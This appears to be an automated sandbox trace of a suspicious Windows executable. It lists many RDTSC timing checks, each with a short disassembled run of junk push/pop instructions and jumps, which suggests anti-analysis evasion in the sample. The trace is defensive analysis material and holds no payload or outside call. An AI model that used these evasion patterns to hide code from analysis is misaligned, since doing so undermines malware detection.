Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBB83 second address: 3EBB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBB87 second address: 3EBB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBB8D second address: 3EBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBE41 second address: 3EBE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBE47 second address: 3EBE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A94CD4085h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EBE61 second address: 3EBE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC15C second address: 3EC178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4080h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC178 second address: 3EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC17C second address: 3EC180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC4A7 second address: 3EC4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC4B1 second address: 3EC4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC4B5 second address: 3EC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC607 second address: 3EC615 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3EC615 second address: 3EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 332D00 second address: 332D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 332D0A second address: 332D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ECF25 second address: 3ECF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ECF2B second address: 3ECF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ECF32 second address: 3ECF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ECF4A second address: 3ECF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3ED6FF second address: 3ED70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3F62C9 second address: 3F62DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F3A9502B5E6h 0x0000000c jnl 00007F3A9502B5E6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3F62DC second address: 3F6308 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD407Ch 0x00000008 push edx 0x00000009 jo 00007F3A94CD4076h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD407Eh 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3F5E7A second address: 3F5E86 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 402085 second address: 402089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 402089 second address: 4020A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5EAh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4020A4 second address: 4020A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C0F second address: 401C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C15 second address: 401C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C19 second address: 401C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C1D second address: 401C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C23 second address: 401C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3A9502B5F9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A9502B5EFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401C55 second address: 401C5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401DC5 second address: 401DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 401DCB second address: 401DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 40430F second address: 404323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 404323 second address: 404329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 408069 second address: 40806F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4081D4 second address: 4081D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4081D8 second address: 4081ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F3A9502B5E8h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 412DB7 second address: 412DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3A94CD407Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 412DC9 second address: 412DD2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 412C1D second address: 412C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 415100 second address: 415111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3A9502B5ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182A9 second address: 4182AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182AD second address: 4182B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182B1 second address: 4182B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182B7 second address: 4182C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182C2 second address: 4182C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182C7 second address: 4182DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F2h 0x00000008 jp 00007F3A9502B5E6h 0x0000000e jne 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4182DF second address: 4182E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A00F second address: 41A013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A013 second address: 41A017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A017 second address: 41A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A022 second address: 41A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3A94CD407Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A046 second address: 41A079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A9502B5F5h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41A079 second address: 41A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41DF17 second address: 41DF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F3A9502B5E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41DF29 second address: 41DF37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41F68C second address: 41F6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3A9502B5E6h 0x00000016 jmp 00007F3A9502B5EDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 41F6BF second address: 41F6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A94CD4086h 0x0000000c jbe 00007F3A94CD4076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 42507F second address: 42508B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3A9502B5E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 42508B second address: 42509D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jng 00007F3A94CD4076h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 423D14 second address: 423D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F3A9502B5E6h 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 423D2A second address: 423D49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3A94CD4076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 423D49 second address: 423D53 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 423D53 second address: 423D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 423E90 second address: 423EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007F3A9502B5E6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 424DE6 second address: 424DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 429649 second address: 429650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436C7C second address: 436C82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436C82 second address: 436CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007F3A9502B5E6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F3A9502B5E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436CA2 second address: 436CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436CA6 second address: 436CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F3A9502B5E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436CB7 second address: 436CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 436CD8 second address: 436CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 43D22C second address: 43D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 43D232 second address: 43D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F3A9502B5EAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 43D243 second address: 43D248 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 43D248 second address: 43D250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 441A41 second address: 441A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 jmp 00007F3A94CD4080h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 441A71 second address: 441A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 441A7B second address: 441A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 44DA90 second address: 44DA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 44DA94 second address: 44DA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4680AF second address: 4680B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4680B4 second address: 4680BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4680BC second address: 4680E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jne 00007F3A9502B5ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3A9502B5EEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 468273 second address: 468279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 468279 second address: 468283 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 468ED8 second address: 468F00 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD407Eh 0x00000008 jmp 00007F3A94CD407Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F3A94CD407Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 46BAB0 second address: 46BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 46BBA4 second address: 46BBAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 46BD60 second address: 46BD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 46C119 second address: 46C123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 46C123 second address: 46C127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 470B0E second address: 470B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 470B16 second address: 470B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3A9502B5E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
